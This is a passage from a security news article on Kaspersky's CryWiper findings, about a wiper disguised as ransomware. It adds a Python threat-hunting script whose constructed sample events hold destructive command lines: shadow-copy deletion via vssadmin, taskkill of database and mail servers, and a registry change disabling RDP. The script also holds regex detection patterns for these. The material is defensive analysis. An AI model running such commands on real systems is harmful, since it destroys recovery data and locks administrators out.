The C2 responds with either a “run” or a “do not run” command, which determines whether the malware starts.
In some cases, the researchers observed execution delays of 4 days (345,600 seconds) to hide the logic behind the infection.
Upon receiving a run response, CryWiper uses the taskkill command to stop processes related to MySQL and MS SQL database servers, the MS Exchange mail server, and MS Active Directory web services. This releases the file locks held by those legitimate applications so that their data files can be destroyed.
The wiper also deletes shadow copies on the compromised machine to prevent victims from restoring the wiped files.
The malware also changes the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections registry setting to prevent RDP connections to the infected system.
To destroy user files, the wiper generates a stream of data with the “Mersenne Twister” pseudo-random number generator and overwrites the original file contents with it.
The malware appends the .CRY extension to the files it has corrupted and drops ransom notes (‘README.txt’) demanding 0.5 Bitcoin for decryption.
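Most of what Kaspersky describes happens through ordinary Windows command-line utilities launched by the wiper, which makes process-creation telemetry the natural place to hunt for it. The added example below is not from Kaspersky’s report: it runs a small weighted rule set over constructed process-creation events (the command lines are plausible renderings of the behaviours above, not captured CryWiper samples; the exact switches, the vssadmin form of the shadow-copy deletion, and the process names are assumptions) and flags hosts whose combined score crosses a threshold. Each rule counts once per host, so a burst of taskkill calls does not inflate the score. A real deployment would feed Sysmon Event ID 1 or Windows 4688 events instead of the embedded sample; the .CRY extension and README.txt drops are file-system artifacts and belong in a separate hunt.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed process-creation telemetry, one event per line: host|parent image|command line.
# The command lines are plausible renderings of the behaviours Kaspersky describes,
# not captured CryWiper samples.
SAMPLE_EVENTS = r"""
srv-docs|explorer.exe|C:\Users\ivan\Downloads\browserupdate.exe
srv-docs|browserupdate.exe|schtasks /create /tn "ChromeUpdate" /tr C:\Users\ivan\Downloads\browserupdate.exe /sc minute /mo 5 /f
srv-docs|browserupdate.exe|taskkill /f /im sqlservr.exe
srv-docs|browserupdate.exe|taskkill /f /im mysqld.exe
srv-docs|browserupdate.exe|taskkill /f /im Microsoft.Exchange.Store.Worker.exe
srv-docs|browserupdate.exe|vssadmin delete shadows /all /quiet
srv-docs|browserupdate.exe|reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
ws-admin|cmd.exe|schtasks /create /tn "NightlyBackup" /tr C:\Tools\backup.exe /sc daily /st 02:00
ws-admin|cmd.exe|taskkill /f /im notepad.exe
"""

# (rule name, pattern over the command line, weight). Weights are assumptions tuned for
# the sample; the point is that the combination, not any single line, is suspicious.
RULES = [
    ("scheduled_task_every_5_min",
     re.compile(r"\bschtasks\b.*?/create\b.*?/sc\s+minute\b.*?/mo\s+5\b", re.I), 2),
    ("kill_db_or_mail_services",
     re.compile(r"\btaskkill\b.*?/im\s+\S*(sqlservr|mysql|exchange|adws)\S*", re.I), 2),
    ("shadow_copy_deletion",
     re.compile(r"(\bvssadmin\b.*?delete\s+shadows|\bwmic\b.*?shadowcopy\s+delete)", re.I), 3),
    ("rdp_disabled_via_registry",
     re.compile(r"fDenyTSConnections\b.*?/d\s+0*1\b", re.I), 2),
]


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split the pipe-delimited sample into {host, parent, cmdline} records."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, parent, cmdline = line.split("|", 2)
        events.append({"host": host, "parent": parent, "cmdline": cmdline})
    return events


def score_hosts(events: List[Dict[str, str]]) -> Dict[str, dict]:
    """Per host: total weight of distinct rules hit, plus the first command line that hit each."""
    per_host: Dict[str, dict] = defaultdict(lambda: {"score": 0, "hits": {}})
    for ev in events:
        for name, pattern, weight in RULES:
            if not pattern.search(ev["cmdline"]):
                continue
            entry = per_host[ev["host"]]
            if name in entry["hits"]:
                continue            # count each behaviour once per host
            entry["hits"][name] = ev["cmdline"]
            entry["score"] += weight
    return dict(per_host)


def flag_hosts(events: List[Dict[str, str]], threshold: int = 6) -> List[str]:
    """Hosts whose distinct-behaviour score reaches the threshold (assumed: 6 of a possible 9)."""
    return sorted(host for host, entry in score_hosts(events).items() if entry["score"] >= threshold)


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for host, entry in score_hosts(events).items():
        print(f"{host}: score={entry['score']} hits={sorted(entry['hits'])}")
    print("flagged:", flag_hosts(events))
```

The ws-admin host in the sample shows why the threshold matters: a nightly backup task and a taskkill against notepad are benign on their own and score nothing, whereas the five-minute task, the database and mail service kills, the shadow-copy deletion, and the RDP lockout together are the wiper’s fingerprint.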
“CryWiper positions itself as a ransomware program, that is, it claims that the victim’s files are encrypted and, if a ransom is paid, they can be restored. However, this is a hoax: in fact, the data has been destroyed and cannot be returned. The activity of CryWiper once again shows that the payment of the ransom does not guarantee the recovery of files.” concludes the report.
(SecurityAffairs – hacking, CryWiper)
The post New CryWiper wiper targets Russian entities masquerading as a ransomware appeared first on Security Affairs.